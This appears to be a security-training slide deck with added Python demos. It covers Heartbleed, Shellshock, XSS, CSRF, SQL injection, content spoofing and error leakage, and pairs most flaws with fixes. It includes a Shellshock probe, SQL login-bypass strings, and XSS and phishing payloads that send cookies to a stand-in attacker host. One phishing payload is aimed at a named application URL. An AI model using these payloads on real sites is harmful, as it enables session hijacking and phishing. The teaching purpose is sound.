©2012 Trimble Navigation Limited
Web Application Vulnerabilities
&
Security Testing
18 Jul 2016
~ Rajil
Objective
The primary objective is to give a brief introduction to critical and
potential vulnerabilities in a web application, together with an
overview of the security testing techniques used to detect underlying
vulnerabilities or security holes in web applications.
We do security testing for
• Confidentiality
• Privilege escalation
• Data integrity
Tools Used
• Nmap
• Zed Attack Proxy (ZAP)
• Metasploit
Demo Systems
• CentOS machine
• Windows 2008 Server
• Kali Linux (attacker)
• Heartbleed
• Shellshock
• Cross Site Scripting (XSS)
• Cross Site Request Forgery (CSRF)
• SQL Injection & Error Messages
• DoS & Buffer Overflow
• Content Spoofing
Heartbleed
Heartbleed (CVE-2014-0160) is a security bug in the OpenSSL cryptography
library, specifically in its implementation of the Transport Layer Security
(TLS) heartbeat extension. The cause is a missing bounds check: the server
copies as many bytes into its heartbeat reply as the client claims to have
sent, without verifying that claim against the record it actually received.
The vulnerability is classified as a buffer over-read, a situation where
more data can be read than should be allowed; each malicious heartbeat can
return up to 64 KB of the server process's memory. The bug name is derived
from "Heartbeat". It was publicly disclosed in April 2014.
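The over-read described above, modeled as an added example in Python (this is not code from the slides or from OpenSSL): the same heartbeat record is handled once the way OpenSSL did before 1.0.1g, copying payload_length bytes on trust, and once with the bounds check the fix introduced. The "heap" bytes following the record, and the session cookie planted in them, are constructed for the demonstration.

```python
# Added example, not from the slides: a Python model of the TLS heartbeat
# over-read. `memory` stands in for the server's heap; the heartbeat record
# sits at its start and whatever follows it is other process data.
import struct

HEARTBEAT_REQUEST = 1
HEADER_LEN = 1 + 2      # type (1 byte) + payload_length (2 bytes)
PADDING_LEN = 16        # RFC 6520 requires at least 16 bytes of random padding


def build_heartbeat(payload: bytes, claimed_length: int) -> bytes:
    """Encode a heartbeat request. An honest peer sets claimed_length ==
    len(payload); the attack sets it far larger (up to 65535)."""
    return (struct.pack("!BH", HEARTBEAT_REQUEST, claimed_length)
            + payload + b"\x00" * PADDING_LEN)


def reply_unchecked(record: bytes, memory: bytes) -> bytes:
    """The pre-1.0.1g behaviour: copy payload_length bytes from the record
    buffer into the reply, trusting the length field on the wire."""
    _hb_type, payload_length = struct.unpack("!BH", record[:HEADER_LEN])
    # Reads past the end of `record` whenever payload_length is larger than
    # the payload that actually arrived.
    return memory[HEADER_LEN:HEADER_LEN + payload_length]


def reply_checked(record: bytes) -> bytes:
    """The fix: reject a heartbeat whose claimed payload (plus header and
    minimum padding) does not fit inside the record actually received."""
    _hb_type, payload_length = struct.unpack("!BH", record[:HEADER_LEN])
    if HEADER_LEN + payload_length + PADDING_LEN > len(record):
        raise ValueError("heartbeat payload_length larger than record; dropped")
    return record[HEADER_LEN:HEADER_LEN + payload_length]


def demo():
    """Constructed sample: a 2-byte payload claiming to be 4000 bytes, followed
    in memory by data from another connection. Returns (leaked, blocked)."""
    evil = build_heartbeat(b"hi", 4000)
    heap = evil + b"...Cookie: JSESSIONID=8f3a1c; user=alice; " + b"\x00" * 5000
    leaked = reply_unchecked(evil, heap)
    try:
        reply_checked(evil)
        blocked = False
    except ValueError:
        blocked = True
    return leaked, blocked


if __name__ == "__main__":
    leaked, blocked = demo()
    print(len(leaked), b"JSESSIONID" in leaked, blocked)
```

The check is the same inequality the 1.0.1g patch added in C (1 + 2 + payload + 16 must not exceed the record length); everything before it is just parsing.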
Heartbleed
OpenSSL 1.0.1 through 1.0.1f are vulnerable; the older 1.0.0 and 0.9.8
branches never contained the heartbeat bug.
• OpenSSL 1.0.1g was released to address this vulnerability
• List of vulnerable websites
https://zmap.io/heartbleed/
http://www.tjkelly.com/blog/heartbleed-website-list/
• To test online
https://sslanalyzer.comodoca.com/heartbleed.html
https://filippo.io/Heartbleed/
Leaked data from a vulnerable website
Shellshock
Shellshock (CVE-2014-6271), also known as Bashdoor, was disclosed on 24 September 2014.
It is a bug in GNU Bash: when Bash imports a function definition from an environment
variable, it also executes any commands that follow the definition. Any web server that
passes attacker-controlled request data into the environment of a Bash process (for
example a CGI script, where request headers become HTTP_* variables) therefore lets the
attacker execute arbitrary shell commands on the target machine.
Windows itself is not affected; the bug is in Bash, so only systems running a vulnerable
Bash are exposed.
Shellshock
To test whether a system is vulnerable, run the command below on the Unix or Linux
machine. A vulnerable Bash prints "vulnerable" and then "hello"; a patched Bash prints
only "hello".
env x='() { :;}; echo vulnerable' bash -c 'echo hello'
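The same probe driven from Python, as an added example that is not part of the slides, together with the CGI step that explains why a web server is the usual entry point: request headers are copied into the environment of the spawned script unchanged. The function and header names are illustrative; the code assumes a bash binary on PATH and reports "bash not found" otherwise.

```python
# Added example, not from the slides: runs the Shellshock probe from Python
# and shows the CGI path that carries an HTTP header into Bash's environment.
import os
import shutil
import subprocess

PROBE = "() { :;}; echo vulnerable"   # the same string the slide passes as x=


def bash_imports_and_executes(env_vars: dict, bash: str = "bash") -> str:
    """Start `bash -c 'echo hello'` with extra environment variables and
    report 'vulnerable', 'patched' or 'bash not found'."""
    if shutil.which(bash) is None:
        return "bash not found"
    env = dict(os.environ, **env_vars)
    proc = subprocess.run([bash, "-c", "echo hello"], env=env,
                          capture_output=True, text=True)
    # A vulnerable Bash runs the trailing command while importing the
    # function definition, so "vulnerable" is printed before "hello".
    return "vulnerable" if "vulnerable" in proc.stdout else "patched"


def shellshock_verdict(bash: str = "bash") -> str:
    """The slide's test: the payload arrives in an arbitrary variable `x`."""
    return bash_imports_and_executes({"x": PROBE}, bash)


def cgi_environment(headers: dict) -> dict:
    """Mimic a CGI gateway: each HTTP request header becomes an HTTP_*
    variable in the environment of the script it spawns, unsanitised.
    A Bash CGI script, or any script that shells out, then imports them."""
    return {"HTTP_" + name.upper().replace("-", "_"): value
            for name, value in headers.items()}


def web_server_verdict(headers: dict, bash: str = "bash") -> str:
    """What a CGI-backed web server would do with a request carrying
    these headers: the attacker never needs a shell, only an HTTP client."""
    return bash_imports_and_executes(cgi_environment(headers), bash)


if __name__ == "__main__":
    print("local bash:", shellshock_verdict())
    print("via CGI headers:", web_server_verdict({"User-Agent": PROBE}))
```

The HTTP_USER_AGENT mapping is what a real gateway does, so sending the probe as a User-Agent header to a CGI script is the remote form of the local test.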
Cross Site Scripting (XSS)
Cross-site scripting is an attack that leverages a flaw in a web application's code
(user-supplied data written into a page without encoding) to deliver attacker-controlled
content to other end users and collect some type of data from the victim.
XSS enables attackers to inject client-side script into web pages viewed by other users.
The injected script runs in the victim's browser under the application's own origin,
where it can read the session cookie and hijack the user's session, or redirect the user
to malicious sites.
Two main types of XSS:
Stored XSS: the payload is saved by the application (a comment, a profile field) and
served to every user who views it.
Reflected XSS: the payload travels in the request (typically a URL parameter) and is
echoed straight back in the response, so the victim must be lured into following a link.
(DOM-based XSS, where client-side script itself inserts untrusted data into the page,
is a third variant.)
Basic test payload; an alert box appears if the input is reflected into the page unencoded:
<script>alert('hello')</script>
Cookie stealing payload:
<script>document.location='http://attacker.com/tinylogger.php?cookie='.concat(escape(document.cookie));</script>
Cross Site Request Forgery (CSRF)
A CSRF attack forces a logged-on victim’s browser to send a
forged HTTP request, including the victim’s session cookie and
any other authentication information, to a vulnerable web
application. This allows the attacker to force the victim’s
browser to generate requests; the vulnerable application thinks
these requests are legitimate.
• The attacker sends the victim a malicious link by some means such as a social networking site, chat
or email. The link is made to look interesting to the victim.
• When the victim clicks the link, their browser sends forged requests to the server without their
knowledge, carrying the victim's session cookie, and the server performs the requested action.
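The forged request described above, as an added example (not code from the slides): a toy money-transfer endpoint that first accepts the request because the victim's cookie rides along automatically, then rejects it once a synchronizer token bound to the session is required. The bank URL, session values and form fields are made up for the illustration.

```python
# Added example, not from the slides: a toy "transfer" endpoint attacked with a
# forged cross-site request, first without and then with a synchronizer token.
import hashlib
import hmac
import secrets

SERVER_SECRET = secrets.token_bytes(32)   # assumed: one secret per deployment


def csrf_token_for(session_id: str) -> str:
    """Mint a token bound to the session: nonce plus an HMAC over (session, nonce)."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(),
                   hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def csrf_token_valid(session_id: str, token: str) -> bool:
    """Recompute the HMAC for this session and compare in constant time."""
    nonce, sep, mac = token.partition(".")
    if not sep:
        return False
    expected = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(),
                        hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)


def transfer_endpoint(request: dict, check_token: bool) -> str:
    """request = {'cookies': {...}, 'form': {...}}. The browser attaches the
    cookie to every request for the site, including ones a third-party page
    triggers; only the token proves the form was served by this site."""
    session = request["cookies"].get("session")
    if session is None:
        return "401 not logged in"
    if check_token and not csrf_token_valid(session, request["form"].get("csrf_token", "")):
        return "403 missing or invalid CSRF token"
    return f"200 sent {request['form']['amount']} to {request['form']['to']}"


# What the attacker's page contains: a form that posts to the bank and submits itself.
ATTACKER_PAGE = """<form id="f" action="https://bank.example/transfer" method="POST">
  <input type="hidden" name="to" value="attacker">
  <input type="hidden" name="amount" value="1000">
</form>
<script>document.getElementById("f").submit()</script>"""


def forged_request(victim_session: str) -> dict:
    """The request the victim's browser emits when it loads ATTACKER_PAGE:
    the victim's cookie is attached automatically, but the attacker cannot
    read the victim's token, so the form carries none."""
    return {"cookies": {"session": victim_session},
            "form": {"to": "attacker", "amount": "1000"}}


def legitimate_request(session: str) -> dict:
    """A form the application itself served, so it embeds a valid token."""
    return {"cookies": {"session": session},
            "form": {"to": "bob", "amount": "25", "csrf_token": csrf_token_for(session)}}


if __name__ == "__main__":
    print(transfer_endpoint(forged_request("s-victim"), check_token=False))
    print(transfer_endpoint(forged_request("s-victim"), check_token=True))
    print(transfer_endpoint(legitimate_request("s-victim"), check_token=True))
```

Binding the token to the session id is what stops an attacker from using a token minted for their own account; the SameSite cookie attribute is a complementary, browser-side defence for the same class of request.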
Denial Of Service Attacks (DoS or DDoS)
• A denial-of-service attack is an attempt to make a machine or network resource
unavailable to its intended users.
• One common method is to saturate the target machine with external communication
requests, so that it cannot respond to legitimate traffic, or responds so slowly that
the service is effectively unusable.
• The attack consumes the target's resources (bandwidth, connection state, CPU, memory)
so that it can no longer provide its intended service.
• A distributed denial-of-service (DDoS) attack is one where the traffic comes from
more than one source, often thousands of unique IP addresses.
Types of DoS Attacks
• ICMP flood
• SYN flood
• Ping flood, and the distinct Ping of Death (a single oversized or malformed ICMP packet
that crashes a vulnerable network stack rather than flooding it)
• Peer-to-peer attacks
• Application-level floods
Application Level DoS Attack
Some DoS attacks rely on software exploits such as buffer overflows rather than on
traffic volume: a single crafted request can crash the application, fill the disk, or
consume all available memory or CPU cycles.
Buffer overflow
A buffer overflow occurs when a program writing data into a buffer overruns the buffer's
boundary and overwrites adjacent memory locations. This may result in erratic program
behavior, including memory access errors, incorrect results, or a crash; when the
overwritten memory holds data the attacker can control, it can also lead to code execution.
Content Spoofing
Content spoofing, also referred to as content injection or virtual
defacement, is an attack targeting a user, made possible by an injection
vulnerability in a web application. When an application does not
properly handle user-supplied data, an attacker can supply content to the
web application, typically via a parameter value, that is reflected back
to the user. This presents the user with a modified page under the
context of the trusted domain.
This attack is typically used in conjunction with phishing attacks.
Sample phishing email
Once the victim clicks a malicious link from that email, the vulnerable application
displays the spoofed content under its own domain. The payload below injects a fake
alert banner through the msg parameter; its "Click Here" link points back at the same
vulnerable page with the cookie-stealing script as the msg value, so it steals the
session of anyone who follows it.
Payload
https://eugmrel.road.com/apps/apm/jspServer/PasswordAlert.jsp?msg=<H1><b>Some malicious activity detected on your acount, kindly <a href="https://eugmrel.road.com/apps/apm/jspServer/PasswordAlert.jsp?msg=<script>document.location='http://attacker.com/tinylogger1.php?cookie='.concat(escape(document.cookie));</script>">Click Here</a> to change the password immediately !!!</b></h1>
SQL Injection
SQL injection is a technique where malicious users can inject SQL
commands into an SQL statement, via web page input. Injected
SQL commands can alter SQL statement and compromise the
security of a web application.
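An added example of the injection just described (not code from the slides): a login query assembled by string concatenation, the two classic inputs that alter it, and the parameterized query that sends the same inputs as values instead of SQL text. The table, the single user row and the plaintext password are constructed to keep the demonstration short; SQLite stands in for whatever database the application uses.

```python
# Added example, not from the slides: SQL injection against a concatenated
# login query, and the parameterized query that is immune to the same input.
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample schema with one user."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'correct horse battery', 'admin')")
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    # User input becomes part of the SQL text, so quotes and comment markers
    # in it change the statement the database executes.
    sql = (f"SELECT username, role FROM users "
           f"WHERE username = '{username}' AND password = '{password}'")
    return conn.execute(sql).fetchone()


def login_parameterized(conn: sqlite3.Connection, username: str, password: str):
    # The statement is fixed; the driver passes the inputs as values, so a
    # quote in the input is just a character in a string.
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()


def injection_demo() -> dict:
    conn = make_db()
    # alice'--   closes the string and comments out the password check:
    #   ... WHERE username = 'alice'--' AND password = 'wrong'
    bypass_user = "alice'--"
    # ' OR '1'='1   turns the WHERE clause into a tautology:
    #   ... WHERE username = 'nobody' AND password = '' OR '1'='1'
    bypass_pass = "' OR '1'='1"
    return {
        "vuln_comment": login_vulnerable(conn, bypass_user, "wrong"),
        "vuln_tautology": login_vulnerable(conn, "nobody", bypass_pass),
        "safe_comment": login_parameterized(conn, bypass_user, "wrong"),
        "safe_tautology": login_parameterized(conn, "nobody", bypass_pass),
        "safe_real": login_parameterized(conn, "alice", "correct horse battery"),
    }


if __name__ == "__main__":
    for case, row in injection_demo().items():
        print(f"{case:15} -> {row}")
```

Both bypasses log the attacker in as the first row the tautology matches, here the admin, without knowing any password; the parameterized version returns nothing for them and still works for the real credentials.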
Error Messages
Revealing system data or debugging information helps an adversary
learn about the system and form a plan of attack. An information leak
occurs when system data or debugging information leaves the program
through an output stream or logging function.
Error Message 1:
java.sql.SQLSyntaxErrorException: ORA-00942: Table or View doesn’t exist
at oracle.jdbc.driver.SQLStateMapping.newSQLException(SQLStateMapping.java:91)
at oracle.jdbc.driver.DatabaseError.newSQLException(DatabaseError.java:112)
at oracle.jdbc.driver.DatabaseError.throwSqlException(DatabaseError.java:173)
at oracle.jdbc.driver.T4CTTIoer.processError(T4CTTIoer.java:455)
at oracle.jdbc.driver.T4CTTIoer.processError(T4CTTIoer.java:413)
at oracle.jdbc.driver.T4C8Oall.receive(T4C8Oall.java:1030)
at oracle.jdbc.driver.T4CPreparedStatement.doOall8(T4CPreparedStatement.java:194)
at oracle.jdbc.driver.T4CPreparedStatement.executeForDescribe(T4CPreparedStatement.java:785)
at oracle.jdbc.driver.T4CPreparedStatement.executeMaybeDescribe(T4CPreparedStatement.java:860)
at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:1186)
Error Message 2:
java.sql.SQLException: ORA-12899: value too large for column
"ROVER"."DRIVER"."DESCRIPTION" (actual: 183, maximum: 80)
at oracle.jdbc.driver.SQLStateMapping.newSQLException(SQLStateMapping.java:70)
at oracle.jdbc.driver.DatabaseError.newSQLException(DatabaseError.java:112)
at oracle.jdbc.driver.DatabaseError.throwSqlException(DatabaseError.java:173)
at oracle.jdbc.driver.T4CTTIoer.processError(T4CTTIoer.java:455)
at oracle.jdbc.driver.T4CTTIoer.processError(T4CTTIoer.java:413)
at oracle.jdbc.driver.T4C8Oall.receive(T4C8Oall.java:1030)
at oracle.jdbc.driver.T4CPreparedStatement.doOall8(T4CPreparedStatement.java:194)
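What an adversary takes from Error Message 2, and the handling that prevents it, as an added example (not code from the slides or the application that produced the traces): the first function extracts the schema, table, column and column width that the ORA-12899 text hands over; the second runs a request so that the full trace goes to the server log while the client receives only an incident reference. The Oracle message is quoted from the slide; the handler, the log list and the failing query are constructed.

```python
# Added example, not from the slides: what leaks from a verbose database
# error, and a handler that logs the trace server-side and returns only an
# incident id to the client.
import re
import traceback
import uuid

ORA_12899 = re.compile(
    r'ORA-12899: value too large for column "([^"]+)"\."([^"]+)"\."([^"]+)" '
    r'\(actual: (\d+), maximum: (\d+)\)')

# Quoted from Error Message 2 on the slide.
SAMPLE_ERROR = ('java.sql.SQLException: ORA-12899: value too large for column '
                '"ROVER"."DRIVER"."DESCRIPTION" (actual: 183, maximum: 80)')

SERVER_LOG = []   # stands in for the application log file


def what_the_attacker_learns(error_text: str):
    """Pull the schema, table, column and column width out of the message;
    the ORA- prefix alone already identifies the DBMS as Oracle."""
    m = ORA_12899.search(error_text)
    if not m:
        return None
    schema, table, column, _actual, maximum = m.groups()
    return {"dbms": "Oracle", "schema": schema, "table": table,
            "column": column, "max_length": int(maximum)}


def handle(work, debug: bool = False):
    """Run `work()` and return (status, body). On failure the full traceback
    goes to SERVER_LOG under an incident id; the client gets only that id,
    unless debug mode is on, which reproduces the leak the slides show."""
    try:
        return 200, work()
    except Exception as exc:
        incident = uuid.uuid4().hex[:12]
        SERVER_LOG.append(f"[{incident}] {traceback.format_exc()}")
        if debug:
            return 500, f"{exc}\n{traceback.format_exc()}"
        return 500, f"An internal error occurred. Reference: {incident}"


def failing_query():
    """Constructed stand-in for the JDBC call that raised Error Message 2."""
    raise RuntimeError(SAMPLE_ERROR)


if __name__ == "__main__":
    print(what_the_attacker_learns(SAMPLE_ERROR))
    print(handle(failing_query, debug=True)[1].splitlines()[0])
    print(handle(failing_query)[1])
    print(SERVER_LOG[-1].splitlines()[0])
```

The incident id is the piece that keeps the generic message useful: support can find the full trace in the log from the reference the user reports, without any of it being shown to the browser.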
Thank You